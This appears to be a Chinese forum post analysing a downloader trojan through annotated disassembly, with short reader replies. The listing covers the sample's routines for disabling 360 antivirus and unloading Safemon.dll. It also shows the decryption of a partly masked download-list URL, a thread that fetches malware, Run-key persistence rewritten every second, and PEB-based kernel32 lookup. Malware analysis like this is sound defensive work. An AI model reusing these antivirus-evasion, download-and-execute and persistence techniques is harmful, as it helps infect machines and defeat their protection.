100014F0 |. 75 0D jnz short 100014FF
100014F2 |. 8D55 C4 lea edx,
100014F5 |. 52 push edx ; /FileName
100014F6 |. FF15 3C800010 call dword ptr [<&KERNEL32.LoadLibra>; \LoadLibraryA
100014FC |. 8945 D0 mov , eax
100014FF |> C645 D4 55 mov byte ptr , 55
...
10001583 |. C645 F5 41 mov byte ptr , 41
10001587 |. C645 F6 00 mov byte ptr , 0 //输入字符UpdateDriverForPlugAndPlayDevicesA
1000158B |. 8D45 D4 lea eax,
1000158E |. 50 push eax ; /ProcNameOrOrdinal
1000158F |. 8B4D D0 mov ecx, ; |
10001592 |. 51 push ecx ; |hModule
10001593 |. FF15 34800010 call dword ptr [<&KERNEL32.GetProcAd>; \GetProcAddress
10001599 |. 8945 B0 mov , eax
1000159C |. 8D55 FC lea edx,
1000159F |. 52 push edx
100015A0 |. 6A 01 push 1
100015A2 |. 8B45 08 mov eax,
100015A5 |. 50 push eax
100015A6 |. 8B4D 0C mov ecx,
100015A9 |. 51 push ecx
100015AA |. 6A 00 push 0
100015AC |. FF55 B0 call //动态调用newdev.UpdateDriverForPlugAndPlayDevicesA
100015AF |. 85C0 test eax, eax
100015B1 |. 75 04 jnz short 100015B7
100015B3 |. 32C0 xor al, al
100015B5 |. EB 0C jmp short 100015C3
100015B7 |> 8B55 F8 mov edx,
100015BA |. 52 push edx
100015BB |. FF15 64810010 call dword ptr [<&SETUPAPI.SetupDiDe>; setupapi.SetupDiDestroyDeviceInfoList
100015C1 |. B0 01 mov al, 1
100015C3 |> 8BE5 mov esp, ebp
100015C5 |. 5D pop ebp
100015C6 \. C3 retn
关键call 5,关闭杀软
10001880 /$ 55 push ebp
10001881 |. 8BEC mov ebp, esp
10001883 |. 81EC DC020000 sub esp, 2DC
10001889 |. C785 F8FDFFFF 74FA4C>mov , 164CFA74
...
10001DD8 |. C685 8CFDFFFF 33 mov byte ptr , 33
10001DDF |. C685 8DFDFFFF 36 mov byte ptr , 36
10001DE6 |. C685 8EFDFFFF 30 mov byte ptr , 30
10001DED |. C685 8FFDFFFF 72 mov byte ptr , 72
10001DF4 |. C685 90FDFFFF 70 mov byte ptr , 70
10001DFB |. C685 91FDFFFF 00 mov byte ptr , 0 ; 360rp
10001E02 |. 8D85 8CFDFFFF lea eax,
10001E08 |. 50 push eax
10001E09 |. E8 32F8FFFF call <KILLAV> //关闭杀软函数
10001E0E |. 83C4 04 add esp, 4
10001E11 |. C685 94FDFFFF 73 mov byte ptr , 73
10001E18 |. C685 95FDFFFF 61 mov byte ptr , 61
10001E1F |. C685 96FDFFFF 66 mov byte ptr , 66
10001E26 |. C685 97FDFFFF 65 mov byte ptr , 65
10001E2D |. C685 98FDFFFF 6D mov byte ptr , 6D
10001E34 |. C685 99FDFFFF 6F mov byte ptr , 6F
10001E3B |. C685 9AFDFFFF 6E mov byte ptr , 6E
10001E42 |. C685 9BFDFFFF 2E mov byte ptr , 2E
10001E49 |. C685 9CFDFFFF 64 mov byte ptr , 64
10001E50 |. C685 9DFDFFFF 6C mov byte ptr , 6C
10001E57 |. C685 9EFDFFFF 6C mov byte ptr , 6C
10001E5E |. C685 9FFDFFFF 00 mov byte ptr , 0 ; Safemon.dll
10001E65 |. 8D8D 94FDFFFF lea ecx,
10001E6B |. 51 push ecx
10001E6C |. E8 CF0D0000 call <卸载> //卸载Safemon.dll函数
10001E71 |. 83C4 04 add esp, 4
10001E74 |> 837D D8 00 cmp , 0
10001E78 |. 0F84 BF000000 je 10001F3D
10001E7E |. 68 2D3FC919 push 19C93F2D
10001E83 |. E8 880C0000 call 10002B10
10001E88 |. 83C4 04 add esp, 4
10001E8B |. 85C0 test eax, eax
10001E8D |. 0F85 AA000000 jnz 10001F3D...
B.dll分析:大小为“9,728”字节,主要分析其导出的Execute函数
Execute函数分析:
10002520 g>/$ 55 push ebp ; (Initial CPU selection)
10002521 |. 8BEC mov ebp,esp
10002523 |. 83EC 28 sub esp,28
10002526 |. C645 EC 53 mov byte ptr ss:,53
1000252A |. C645 ED 65 mov byte ptr ss:,65
1000252E |. C645 EE 42 mov byte ptr ss:,42
10002532 |. C645 EF 65 mov byte ptr ss:,65
10002536 |. C645 F0 62 mov byte ptr ss:,62
1000253A |. C645 F1 75 mov byte ptr ss:,75
1000253E |. C645 F2 67 mov byte ptr ss:,67
10002542 |. C645 F3 50 mov byte ptr ss:,50
10002546 |. C645 F4 72 mov byte ptr ss:,72
1000254A |. C645 F5 69 mov byte ptr ss:,69
1000254E |. C645 F6 76 mov byte ptr ss:,76
10002552 |. C645 F7 69 mov byte ptr ss:,69
10002556 |. C645 F8 6C mov byte ptr ss:,6C
1000255A |. C645 F9 65 mov byte ptr ss:,65
1000255E |. C645 FA 67 mov byte ptr ss:,67
10002562 |. C645 FB 65 mov byte ptr ss:,65
10002566 |. C645 FC 00 mov byte ptr ss:,0
1000256A |. 68 D8FB457A push 7A45FBD8
1000256F |. E8 ACECFFFF call <gterg.取API函数>
10002574 |. 83C4 04 add esp,4
10002577 |. 8945 E0 mov ,eax ; 把获取的API地址存入局部变量中
1000257A |. 68 A4746248 push 486274A4
1000257F |. E8 9CECFFFF call <gterg.取API函数>
10002584 |. 83C4 04 add esp,4
10002587 |. 8945 E8 mov ,eax ; 把获取的API地址存入局部变量中
1000258A |. 68 1F332F67 push 672F331F
1000258F |. E8 8CECFFFF call <gterg.取API函数>
10002594 |. 83C4 04 add esp,4
10002597 |. 8945 D8 mov ,eax
1000259A |. 8D45 EC lea eax,
1000259D |. 50 push eax
1000259E |. 6A 00 push 0
100025A0 |. 68 01001F00 push 1F0001
100025A5 |. FF55 E0 call ; 动态调用kernel32.OpenMutexA函数
100025A8 |. 8945 E4 mov ,eax
100025AB |. 837D E4 00 cmp ,0
100025AF |. 75 10 jnz short gterg.100025C1
100025B1 |. 8D4D EC lea ecx,
100025B4 |. 51 push ecx
100025B5 |. 6A 00 push 0
100025B7 |. 6A 00 push 0
100025B9 |. FF55 E8 call ; kernel32.CreateMutexA
100025BC |. 8945 E4 mov ,eax
100025BF |. EB 05 jmp short gterg.100025C6
100025C1 |> 6A 00 push 0
100025C3 |. FF55 D8 call
100025C6 |> 6A 00 push 0 ; /pThreadId = NULL
100025C8 |. 6A 00 push 0 ; |CreationFlags = 0
100025CA |. 6A 00 push 0 ; |pThreadParm = NULL
100025CC |. 68 40230010 push gterg.10002340 ; |ThreadFunction = gterg.10002340//线程函数3
100025D1 |. 6A 00 push 0 ; |StackSize = 0
100025D3 |. 6A 00 push 0 ; |pSecurity = NULL
100025D5 |. FF15 34300010 call dword ptr ds:[<&KERNEL32.Creat>; \CreateThread
100025DB |. 8945 DC mov ,eax
100025DE |. 8B55 DC mov edx,
100025E1 |. 52 push edx ; /hObject
100025E2 |. FF15 10300010 call dword ptr ds:[<&KERNEL32.Close>; \CloseHandle
100025E8 |. 6A 00 push 0 ; /pThreadId = NULL
100025EA |. 6A 00 push 0 ; |CreationFlags = 0
100025EC |. 6A 00 push 0 ; |pThreadParm = NULL
100025EE |. 68 F0240010 push gterg.100024F0 ; |ThreadFunction = gterg.100024F0//线程函数4
100025F3 |. 6A 00 push 0 ; |StackSize = 0
100025F5 |. 6A 00 push 0 ; |pSecurity = NULL
100025F7 |. FF15 34300010 call dword ptr ds:[<&KERNEL32.Creat>; \CreateThread
100025FD |. 8945 DC mov ,eax
10002600 |. 6A FF push -1 ; /Timeout = INFINITE
10002602 |. 8B45 DC mov eax, ; |
10002605 |. 50 push eax ; |hObject
10002606 |. FF15 18300010 call dword ptr ds:[<&KERNEL32.WaitF>; \WaitForSingleObject
1000260C |. 33C0 xor eax,eax
1000260E |. 8BE5 mov esp,ebp
10002610 |. 5D pop ebp
10002611 \. C3 retn
//线程函数3,下载病毒文件
10002340 /. 55 push ebp
10002341 |. 8BEC mov ebp,esp
10002343 |. 81EC 38030000 sub esp,338
10002349 |. 68 81694C21 push 214C6981
1000234E |. E8 CDEEFFFF call <gterg.取API函数>
10002353 |. 83C4 04 add esp,4
10002356 |. 8985 E4FDFFFF mov ,eax
1000235C |. 68 04010000 push 104
10002361 |. 8D85 F8FEFFFF lea eax,
10002367 |. 50 push eax
10002368 |. FF95 E4FDFFFF call ; kernel32.GetSystemDirectoryA
1000236E |. C685 D4FDFFFF 5>mov byte ptr ss:,5C
10002375 |. C685 D5FDFFFF 5>mov byte ptr ss:,5C
1000237C |. C685 D6FDFFFF 7>mov byte ptr ss:,77
10002383 |. C685 D7FDFFFF 6>mov byte ptr ss:,69
1000238A |. C685 D8FDFFFF 6>mov byte ptr ss:,6E
10002391 |. C685 D9FDFFFF 6>mov byte ptr ss:,69
10002398 |. C685 DAFDFFFF 6>mov byte ptr ss:,6E
1000239F |. C685 DBFDFFFF 6>mov byte ptr ss:,65
100023A6 |. C685 DCFDFFFF 7>mov byte ptr ss:,74
100023AD |. C685 DDFDFFFF 2>mov byte ptr ss:,2E
100023B4 |. C685 DEFDFFFF 6>mov byte ptr ss:,64
100023BB |. C685 DFFDFFFF 6>mov byte ptr ss:,6C
100023C2 |. C685 E0FDFFFF 6>mov byte ptr ss:,6C
100023C9 |. C685 E1FDFFFF 0>mov byte ptr ss:,0 ; 输入字符\\wininet.dll
100023D0 |. 8D8D D4FDFFFF lea ecx,
100023D6 |. 51 push ecx ; /StringToAdd
100023D7 |. 8D95 F8FEFFFF lea edx, ; |
100023DD |. 52 push edx ; |ConcatString
100023DE |. FF15 0C300010 call dword ptr ds:[<&KERNEL32.lstrcatA>] ; \lstrcatA
100023E4 |. 68 18813B72 push 723B8118
100023E9 |. E8 32EEFFFF call <gterg.取API函数>
100023EE |. 83C4 04 add esp,4
100023F1 |. 8985 F0FEFFFF mov ,eax
100023F7 |. 8D85 E8FDFFFF lea eax,
100023FD |. 50 push eax
100023FE |. 68 04010000 push 104
10002403 |. FF95 F0FEFFFF call ; kernel32.GetTempPathA
10002409 |. 8D8D C8FCFFFF lea ecx,
1000240F |. 51 push ecx ; /TempName
10002410 |. 6A 00 push 0 ; |Unique = 0
10002412 |. 6A 00 push 0 ; |Prefix = NULL
10002414 |. 8D95 E8FDFFFF lea edx, ; |
1000241A |. 52 push edx ; |Path
1000241B |. FF15 28300010 call dword ptr ds:[<&KERNEL32.GetTempFileNameA>>; \GetTempFileNameA
10002421 |. 68 04B5FE3A push 3AFEB504
10002426 |. E8 F5EDFFFF call <gterg.取API函数>
1000242B |. 83C4 04 add esp,4
1000242E |. 8985 F4FEFFFF mov ,eax
10002434 |. 6A 00 push 0
10002436 |. 8D85 C8FCFFFF lea eax,
1000243C |. 50 push eax
1000243D |. 8D8D F8FEFFFF lea ecx,
10002443 |. 51 push ecx
10002444 |. FF95 F4FEFFFF call ; kernel32.CopyFileA
1000244A |. 8D95 C8FCFFFF lea edx,
10002450 |. 52 push edx ; //FileName = "C:\DOCUME~1\safe\LOCALS~1\Temp\B.tmp"
10002451 |. FF15 2C300010 call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; \\LoadLibraryA
10002457 |. 8985 D0FDFFFF mov ,eax
1000245D |. 68 C0058F0B push 0B8F05C0
10002462 |. 8B85 D0FDFFFF mov eax,
10002468 |. 50 push eax
10002469 |. E8 92ECFFFF call <gterg.获取API函数>
1000246E |. 83C4 08 add esp,8
10002471 |. A3 48400010 mov dword ptr ds:,eax
10002476 |. 68 07166015 push 15601607
1000247B |. 8B8D D0FDFFFF mov ecx,
10002481 |. 51 push ecx
10002482 |. E8 79ECFFFF call <gterg.获取API函数>
10002487 |. 83C4 08 add esp,8
1000248A |. A3 4C400010 mov dword ptr ds:,eax
1000248F |. 68 2DAF9C4E push 4E9CAF2D
10002494 |. 8B95 D0FDFFFF mov edx,
1000249A |. 52 push edx
1000249B |. E8 60ECFFFF call <gterg.获取API函数>
100024A0 |. 83C4 08 add esp,8
100024A3 |. A3 40400010 mov dword ptr ds:,eax
100024A8 |. 68 01144601 push 1461401
100024AD |. 8B85 D0FDFFFF mov eax,
100024B3 |. 50 push eax
100024B4 |. E8 47ECFFFF call <gterg.获取API函数>
100024B9 |. 83C4 08 add esp,8
100024BC |. A3 44400010 mov dword ptr ds:,eax
100024C1 |> B9 01000000 /mov ecx,1
100024C6 |. 85C9 |test ecx,ecx
100024C8 |. 74 12 |je short gterg.100024DC
100024CA |. E8 21FBFFFF |call gterg.10001FF0 //关键call 6
100024CF |. 68 40E5D900 |push 0D9E540 ; /Timeout = 14280000. ms
100024D4 |. FF15 1C300010 |call dword ptr ds:[<&KERNEL32.Sleep>] ; \Sleep
100024DA |.^ EB E5 \jmp short gterg.100024C1
100024DC |> 33C0 xor eax,eax
100024DE |. 8BE5 mov esp,ebp
100024E0 |. 5D pop ebp
100024E1 \. C2 0400 retn 4进入关键call 6,此函数连接网络下载病毒列表文件,根据列表内容下载病毒。10001FF0 /$ 55 push ebp
10001FF1 |. 8BEC mov ebp,esp
10001FF3 |. 81EC 00030000 sub esp,300
10001FF9 |. C785 34FEFFFF 0>mov ,0
10002003 |. EB 0F jmp short gterg.10002014
10002005 |> 8B85 34FEFFFF /mov eax,
1000200B |. 83C0 01 |add eax,1
1000200E |. 8985 34FEFFFF |mov ,eax
10002014 |> 83BD 34FEFFFF 6> cmp ,64
1000201B |. 7D 02 |jge short gterg.1000201F
1000201D |.^ EB E6 \jmp short gterg.10002005
1000201F |> 6A 4F push 4F
10002021 |. 6A 40 push 40
10002023 |. 8D8D 40FFFFFF lea ecx,
10002029 |. 51 push ecx
1000202A |. 68 00400010 push gterg.10004000 ; ';;?u``;7;a~{yw{|a, "uww`7 $a;7;OOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
1000202F |. E8 3CF2FFFF call gterg.10001270 ; 解密函数,解出下载列表地址"http://txt.146***843.com:8080/xok.txt"
10002034 |. 83C4 10 add esp,10
10002037 |. C785 30FEFFFF 0>mov ,0
10002041 |. EB 0F jmp short gterg.10002052
10002043 |> 8B95 30FEFFFF /mov edx,
10002049 |. 83C2 01 |add edx,1
1000204C |. 8995 30FEFFFF |mov ,edx
10002052 |> 83BD 30FEFFFF 6> cmp ,64
10002059 |. 7D 02 |jge short gterg.1000205D
1000205B |.^ EB E6 \jmp short gterg.10002043
1000205D |> 68 81694C21 push 214C6981
10002062 |. E8 B9F1FFFF call <gterg.取API函数>
10002067 |. 83C4 04 add esp,4
1000206A |. 8945 E8 mov ,eax
1000206D |. 68 04010000 push 104
10002072 |. 8D85 38FEFFFF lea eax,
10002078 |. 50 push eax
10002079 |. FF55 E8 call ; kernel32.GetSystemDirectoryA
1000207C |. C645 F4 75 mov byte ptr ss:,75
10002080 |. C645 F5 73 mov byte ptr ss:,73
10002084 |. C645 F6 65 mov byte ptr ss:,65
10002088 |. C645 F7 72 mov byte ptr ss:,72
1000208C |. C645 F8 33 mov byte ptr ss:,33
10002090 |. C645 F9 32 mov byte ptr ss:,32
10002094 |. C645 FA 2E mov byte ptr ss:,2E
10002098 |. C645 FB 64 mov byte ptr ss:,64
1000209C |. C645 FC 6C mov byte ptr ss:,6C
100020A0 |. C645 FD 6C mov byte ptr ss:,6C
100020A4 |. C645 FE 00 mov byte ptr ss:,0 ; user32.dll
100020A8 |. 8D4D F4 lea ecx,
100020AB |. 51 push ecx ; /pModule
100020AC |. FF15 30300010 call dword ptr ds:[<&KERNEL32.GetModuleHandleA>>; \GetModuleHandleA
100020B2 |. 8945 CC mov ,eax
100020B5 |. 68 D3774938 push 384977D3
100020BA |. 8B55 CC mov edx,
100020BD |. 52 push edx
100020BE |. E8 3DF0FFFF call <gterg.获取API函数>
100020C3 |. 83C4 08 add esp,8
100020C6 |. 8945 D4 mov ,eax
100020C9 |. 68 8A7F0000 push 7F8A
100020CE |. 68 007F0000 push 7F00 ; /RsrcName = IDC_ARROW
100020D3 |. 6A 00 push 0 ; |hInst = NULL
100020D5 |. FF15 4C300010 call dword ptr ds:[<&USER32.LoadCursorA>] ; \LoadCursorA
100020DB |. 50 push eax ; /hIcon
100020DC |. FF15 44300010 call dword ptr ds:[<&USER32.CopyIcon>] ; \CopyIcon
100020E2 |. 50 push eax
100020E3 |. FF55 D4 call ; user32.SetSystemCursor
100020E6 |. C745 D0 0000000>mov ,0
100020ED |. 8D45 D0 lea eax,
100020F0 |. 50 push eax
100020F1 |. 8D8D 40FFFFFF lea ecx,
100020F7 |. 51 push ecx
100020F8 |. E8 E3FCFFFF call gterg.10001DE0 ; 连接网络下载病毒列表文件
...下面的代码就是下载病毒并运行的部分了,篇幅有限这里就不在写了。//线程函数4,作用每隔1000MS,写开机自启动项键值SOFTWARE\Microsoft\Windows\CurrentVersion\Run,C:\WINDOWS\system32\system.exe100024F0 /. 55 push ebp ; persistence-reinforcement routine (the author labels it thread function 4); stdcall with one 4-byte argument, see the retn 4 below
100024F1 |. 8BEC mov ebp,esp ; no stack locals are reserved; all work happens inside call 7
100024F3 |> B8 01000000 /mov eax,1 ; loop head: compiler form of while(1), eax is always 1 at this point
100024F8 |. 85C0 |test eax,eax ; ZF is never set here, so the je below is never taken
100024FA |. 74 12 |je short gterg.1000250E ; dead exit edge; the loop has no other way out, it runs until the thread is torn down
100024FC |. E8 2FEEFFFF |call gterg.10001330 //关键call 7 ; per the author's note this re-writes the Run value (RegSetValueExA in call 7); detection/cleanup note: the value is re-created every second, so removing it once is not sufficient while this process lives
10002501 |. 68 E8030000 |push 3E8 ; /Timeout = 1000. ms ; one-second spacing between rewrites
10002506 |. FF15 1C300010 |call dword ptr ds:[<&KERNEL32.Slee>; \Sleep
1000250C |.^ EB E5 \jmp short gterg.100024F3 //每隔1000MS循环 ; unconditional back-edge
1000250E |> 33C0 xor eax,eax ; unreachable epilogue: would return 0 (callee pops the single argument via retn 4)
10002510 |. 5D pop ebp
10002511 \. C2 0400 retn 4关键进入call 7,作用写自启动项10001330 /$ 55 push ebp
10001331 |. 8BEC mov ebp,esp
...
100019E6 |. C685 F5FEFFFF 0>mov byte ptr ss:,0 ; SOFTWARE\Microsoft\Windows\CurrentVersion\Run
100019ED |. 8D8D A0FEFFFF lea ecx, ; 看见这个键值就可以知道下面要写自启动项
100019F3 |. 51 push ecx
100019F4 |. 68 06000200 push 20006
100019F9 |. 6A 00 push 0
100019FB |. 8D95 C8FEFFFF lea edx,
10001A01 |. 52 push edx
10001A02 |. 68 02000080 push 80000002
10001A07 |. FF95 B8FEFFFF call ; advapi32.RegOpenKeyExA
10001A0D |. 68 04010000 push 104 ; /BufSize = 104 (260.)
10001A12 |. 8D85 F8FEFFFF lea eax, ; |
10001A18 |. 50 push eax ; |Buffer
10001A19 |. FF15 08300010 call dword ptr ds:[<&KERNEL32.GetSy>; \GetSystemDirectoryA
10001A1F |. C685 BCFEFFFF 5>mov byte ptr ss:,5C
10001A26 |. C685 BDFEFFFF 7>mov byte ptr ss:,73
10001A2D |. C685 BEFEFFFF 7>mov byte ptr ss:,79
10001A34 |. C685 BFFEFFFF 7>mov byte ptr ss:,73
10001A3B |. C685 C0FEFFFF 7>mov byte ptr ss:,74
10001A42 |. C685 C1FEFFFF 6>mov byte ptr ss:,65
10001A49 |. C685 C2FEFFFF 6>mov byte ptr ss:,6D
10001A50 |. C685 C3FEFFFF 2>mov byte ptr ss:,2E
10001A57 |. C685 C4FEFFFF 6>mov byte ptr ss:,65
10001A5E |. C685 C5FEFFFF 7>mov byte ptr ss:,78
10001A65 |. C685 C6FEFFFF 6>mov byte ptr ss:,65
10001A6C |. C685 C7FEFFFF 0>mov byte ptr ss:,0 ; \system.exe
...
10001B15 |. C685 C3FEFFFF 0>mov byte ptr ss:,0
10001B1C |. 8D85 F8FEFFFF lea eax,
10001B22 |. 50 push eax ; //String = "C:\WINDOWS\system32\system.exe"
10001B23 |. FF15 00300010 call dword ptr ds:[<&KERNEL32.lstrl>; \\lstrlenA取字符串长度
10001B29 |. 50 push eax
10001B2A |. 8D8D F8FEFFFF lea ecx,
10001B30 |. 51 push ecx
10001B31 |. 6A 01 push 1
10001B33 |. 6A 00 push 0
10001B35 |. 8D95 BDFEFFFF lea edx,dword ptr ss:
10001B3B |. 52 push edx
10001B3C |. 8B85 A0FEFFFF mov eax,
10001B42 |. 50 push eax
10001B43 |. FF95 B4FEFFFF call ; advapi32.RegSetValueExA//写开机自启动项
10001B49 |. 5F pop edi
10001B4A |. 5E pop esi
10001B4B |. 8BE5 mov esp,ebp
10001B4D |. 5D pop ebp
10001B4E \. C3 retn顺便提一下获取kernel32.dll模块地址的一种方法:100011DD |. 64:8B1D 3000000>mov ebx,dword ptr fs: ; //这边4行代码是获取kernel32.dll模块地址,这是取kernel32.dll模块地址方法之一
100011E4 |. 8B4B 0C mov ecx,dword ptr ds:
100011E7 |. 8B49 1C mov ecx,dword ptr ds:
100011EA |. 8B09 mov ecx,dword ptr ds:
100011EC |. 8B41 08 mov eax,dword ptr ds: ; //把kernel32.dll模块地址存入EAX有不对之处还请大家指教。
谢谢啦,好详细,先作个记号,有空断网自己玩一下 高手分析,谢谢详细介绍 很不错 本帖最后由 huzhao23 于 2010-7-22 00:50 编辑
这个怎么跟我前几天看的那个下载者一样呢,太神奇了,我分析的样本名字叫做ssdown.
A.DLL 里面的驱动部分是对抗杀毒软件的关键,B.tmp 文件在rundll32.exe 进程中是否被加载? 列表文本文件里的内容是否是加密的还是没有加密的呢?,期待楼主的详细分析啊:handshake 支持详细分析的
来学习下 楼主分析的太好了。膜拜! 下下来看一看 呵顶一个 学习下 360不是拦截驱动,这有啥用。